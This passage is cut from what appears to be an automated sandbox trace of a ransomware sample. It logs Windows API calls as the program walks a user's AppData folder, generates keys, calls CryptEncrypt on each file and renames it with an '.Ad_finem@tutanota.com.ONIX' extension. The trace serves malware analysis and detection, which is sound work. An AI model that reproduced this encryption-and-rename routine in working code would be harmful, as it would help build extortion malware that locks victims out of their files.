nNumberOfBytesToUnlockLow=0x7426, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.025] CloseHandle (hObject=0x524) returned 1 [0129.026] GetProcessHeap () returned 0x410000 [0129.026] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.026] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-hr1rctbqi.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\-HR1rCTBQI.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\-hr1rctbqi.mp3.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.029] GetProcessHeap () returned 0x410000 [0129.029] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.029] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb1285480, ftCreationTime.dwHighDateTime=0x1d5ddbf, ftLastAccessTime.dwLowDateTime=0x5b3c010, ftLastAccessTime.dwHighDateTime=0x1d5e1a4, ftLastWriteTime.dwLowDateTime=0x5b3c010, ftLastWriteTime.dwHighDateTime=0x1d5e1a4, nFileSizeHigh=0x0, nFileSizeLow=0x150b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="37MaxwlYEtO.png", cAlternateFileName="37MAXW~1.PNG")) returned 1 [0129.029] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\37maxwlyeto.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.029] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.029] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x150b7, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.029] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.029] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.030] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.030] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.030] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.030] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.030] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png", dwFileAttributes=0x80) returned 1 [0129.030] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png") returned 62 [0129.031] GetProcessHeap () returned 0x410000 [0129.031] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x431d68 [0129.031] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png" [0129.031] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.031] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=86199) returned 1 [0129.031] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x150b7 [0129.031] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.031] GetProcessHeap () returned 0x410000 [0129.031] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.031] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.031] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.033] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.034] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.035] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x150b7) returned 0xf70048 [0129.035] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x150b7) returned 0xf85108 [0129.035] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.036] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x150b7, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x150b7, lpOverlapped=0x0) returned 1 [0129.039] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x150b7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.039] CloseHandle (hObject=0x524) returned 1 [0129.040] GetProcessHeap () returned 0x410000 [0129.040] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.040] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\37maxwlyeto.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\37MaxwlYEtO.png.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\37maxwlyeto.png.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.046] GetProcessHeap () returned 0x410000 [0129.046] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.046] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe8bafa80, ftCreationTime.dwHighDateTime=0x1d5d9df, ftLastAccessTime.dwLowDateTime=0x9515bd80, ftLastAccessTime.dwHighDateTime=0x1d5e4d3, ftLastWriteTime.dwLowDateTime=0x9515bd80, ftLastWriteTime.dwHighDateTime=0x1d5e4d3, nFileSizeHigh=0x0, nFileSizeLow=0x17e97, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5yaQa8kiOK jxuOcDcm.jpg", cAlternateFileName="5YAQA8~1.JPG")) returned 1 [0129.046] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5yaqa8kiok jxuocdcm.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.047] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.047] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x17e97, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.047] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.047] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.048] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.048] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.048] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.048] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.048] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg", dwFileAttributes=0x80) returned 1 [0129.048] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg") returned 70 [0129.048] GetProcessHeap () returned 0x410000 [0129.048] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xfc) returned 0x4d8e98 [0129.048] lstrcpyW (in: lpString1=0x4d8e98, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg" [0129.048] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.048] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=97943) returned 1 [0129.048] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x17e97 [0129.048] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.048] GetProcessHeap () returned 0x410000 [0129.048] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8fa0 [0129.048] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8fa0*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.049] WriteFile (in: hFile=0x524, lpBuffer=0x4d8fa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8fa0*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.050] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.051] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.052] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17e97) returned 0xf70048 [0129.053] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x17e97) returned 0xf87ee8 [0129.053] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.053] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x17e97, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x17e97, lpOverlapped=0x0) returned 1 [0129.057] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x17e97, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.058] CloseHandle (hObject=0x524) returned 1 [0129.058] GetProcessHeap () returned 0x410000 [0129.059] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8fa0 | out: hHeap=0x410000) returned 1 [0129.059] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5yaqa8kiok jxuocdcm.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5yaQa8kiOK jxuOcDcm.jpg.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5yaqa8kiok jxuocdcm.jpg.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.062] GetProcessHeap () returned 0x410000 [0129.062] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.062] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc7498550, ftCreationTime.dwHighDateTime=0x1d5e246, ftLastAccessTime.dwLowDateTime=0x29e42350, ftLastAccessTime.dwHighDateTime=0x1d5dd10, ftLastWriteTime.dwLowDateTime=0x29e42350, ftLastWriteTime.dwHighDateTime=0x1d5dd10, nFileSizeHigh=0x0, nFileSizeLow=0x15855, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6nfz0JJw49304w50.pptx", cAlternateFileName="6NFZ0J~1.PPT")) returned 1 [0129.062] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6nfz0jjw49304w50.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.062] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.062] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15855, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.062] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.063] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.063] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.063] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.064] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.064] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.064] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx", dwFileAttributes=0x80) returned 1 [0129.064] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx") returned 68 [0129.064] GetProcessHeap () returned 0x410000 [0129.064] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8) returned 0x431d68 [0129.064] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx" [0129.064] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.064] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=88149) returned 1 [0129.064] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15855 [0129.064] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.064] GetProcessHeap () returned 0x410000 [0129.064] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.064] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.065] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.066] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.067] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.068] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15855) returned 0xf70048 [0129.069] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15855) returned 0xf858a8 [0129.069] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.069] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x15855, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x15855, lpOverlapped=0x0) returned 1 [0129.078] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15855, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.078] CloseHandle (hObject=0x524) returned 1 [0129.079] GetProcessHeap () returned 0x410000 [0129.079] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.079] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6nfz0jjw49304w50.pptx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6nfz0JJw49304w50.pptx.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6nfz0jjw49304w50.pptx.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.082] GetProcessHeap () returned 0x410000 [0129.082] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.082] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4224a890, ftCreationTime.dwHighDateTime=0x1d5dea0, ftLastAccessTime.dwLowDateTime=0xafbad180, ftLastAccessTime.dwHighDateTime=0x1d5e725, ftLastWriteTime.dwLowDateTime=0xafbad180, ftLastWriteTime.dwHighDateTime=0x1d5e725, nFileSizeHigh=0x0, nFileSizeLow=0x87ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9jmp1RNYhWI6 Hu.flv", cAlternateFileName="9JMP1R~1.FLV")) returned 1 [0129.082] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9jmp1rnyhwi6 hu.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.082] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.083] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x87ee, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.083] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.083] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.084] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.084] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.084] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.084] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.084] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv", dwFileAttributes=0x80) returned 1 [0129.084] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv") returned 66 [0129.084] GetProcessHeap () returned 0x410000 [0129.084] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf4) returned 0x431d68 [0129.084] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv" [0129.084] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9jmp1RNYhWI6 Hu.flv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.084] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=34798) returned 1 [0129.084] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x87ee [0129.084] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.084] GetProcessHeap () returned 0x410000 [0129.084] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.084] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, 